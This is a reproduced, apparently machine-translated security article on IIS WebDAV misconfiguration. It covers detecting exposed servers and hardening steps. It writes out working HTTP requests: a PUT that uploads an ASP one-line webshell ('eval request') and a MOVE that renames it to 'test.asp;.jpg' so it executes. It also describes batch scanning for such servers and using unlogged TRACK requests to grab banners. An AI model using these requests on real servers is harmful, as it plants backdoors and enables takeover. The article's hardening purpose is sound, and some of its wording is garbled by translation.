This article is reproduced, the original address: http://www.2cto.com/article/201307/228165.html
IIS WebDAV Security Configuration
2013-07-16 12:13:00 Author: sleepy dragon collection I want to contribute
0x00 Introduction
WebDAV is a communication protocol based on the HTTP 1.1 protocol. It extends HTTP 1.1 and adds some new methods in addition to several HTTP standard methods such as GET, POST, and HEAD.
The application program can directly read and write to the Web Server, and supports writing file locking (Unlock) and unlock (Unlock), and can also support file version control.
IIS realizes Webdav is the ISAPI interface of its two interfaces CGI and ISAPI.
But because it does not use insinuation, the main program w3svc.dll of IIS itself contains Webdav information.
After recognizing that it is a Webdav request, it calls the Webdav processing module httpext.dll.
For several common request methods GET, HEAD, POST, etc., because some common mappings are supported.
Therefore, the request method cannot be used as the judgment of the Webdav request, and w3svc.dll is identified according to the field of the request header.
If the request header contains one of Translate :, If :, Lock-Token :, it is considered a Webdav request.
Translate: is a request header of the leaked source code of Translate: f, in fact, the other two settings are the same.
Many IDS may not have this knowledge. W3svc.dll also has built-in several other request methods TRACK, TRACE, etc.
TRACK is used for debugging errors. If such a request header is received, w3svc.dll will return the request data as it is.
Equivalent to our common ping.exe.
IIS does not log the TRACK request, which we can use to obtain the banner.
For IIS, it will be better than the HEAD that everyone is used to.
If the above request method does not match, then w3svc.dll will be regarded as a Webdav request and will be handled by httpext.dll.
These requests include PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK, UNLOCK, etc. supported by Webdav.
0x01 configuration
For security reasons, IIS does not start WebDAV by default, so it must be activated separately.
Start the WebDAV function by starting "IIS Manager", expanding the local computer, selecting "Web Service Extension", and selecting "Allow".
After opening WebDAV, IIS supports PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK, UNLOCK and other methods.
enter image description here
When the configuration in IIS allows writing, you can directly PUT the file, which may cause very serious security problems. It is strongly recommended to ban
enter image description here
0x02 hazard
When WebDAV is turned on, and IIS is configured with writable directories, serious problems will occur. There are many problems with this configuration on wooyun, and some foreigners have hacked a group of Chinese government stations. Part of this is due to this configuration. The harm is huge, the operation is simple, directly batch scan, upload shell.
0x03 Find the problematic server
Send OPTION package to the server:
OPTIONS / HTTP/1.1
Host: www.test.com
The response header returned is as follows:
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: DAV:sql
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
When the above method is included in ALLOW, it can be determined that WebDAV is enabled on the server.
At this time, you can use PUT to upload files, but you cannot upload executable script files directly. You can upload a file of another type first, and then MOVE into a script file.
PUT /test.txt HTTP/1.1
Host: www.test.com
Content-Length: 23
<%eval request("a")%>
With the "WebDAV" extension enabled and "Write" checked, you can write to a txt file. To use the MOVE command to rename it as a script file suffix, you must also check "Script Resource Access".
However, if you find a parsing vulnerability using IIS, you can MOVE it into test.asp; .jpg, and then you can execute it as a shell
MOVE /test.txt HTTP/1.1
Host: www.test.com
Destination: http://www.test.com/test.asp;.jpg
There is an open source DAV management tool, use the tool to view directly:
http://www.davexplorer.org/download.html
0x03 repair plan
1 Disable WebDAV.
Under normal circumstances, the website does not need to support additional methods. Right-click WebDAV and click Disable.
2 If you want to use WebDAV, add permission verification.
If "script resource access" is selected, the user will have the function to modify the script file in the WebADV folder.
In addition to the virtual directory permissions here, NTFS permissions are also required to determine whether the user has permission to access files in the WebDAV folder.
The NTFS permissions of the WebDAV folder give the user appropriate NTFS permissions.
First, please set the Everyone group to only have the "read" permission, and then give the "write" permission to individual users, for example, we give the user "User" write permission.
Select the method to verify the user's identity and start the "IIS Manager", then right-click the WebDAV virtual directory, select "Properties" → "Directory Security", and click the edit button at "Authentication and Access Control".
Do not select "Enable Anonymous Access" to avoid incurring attacks. Choose a secure authentication method and select "Integrated Windows Authentication".
enter image description here
reference:
http://www.2cto.com/Article/201307/228162.html
http://www.2cto.com/Article/200410/1313.html
http://www.2cto.com/Article/201307/228163.html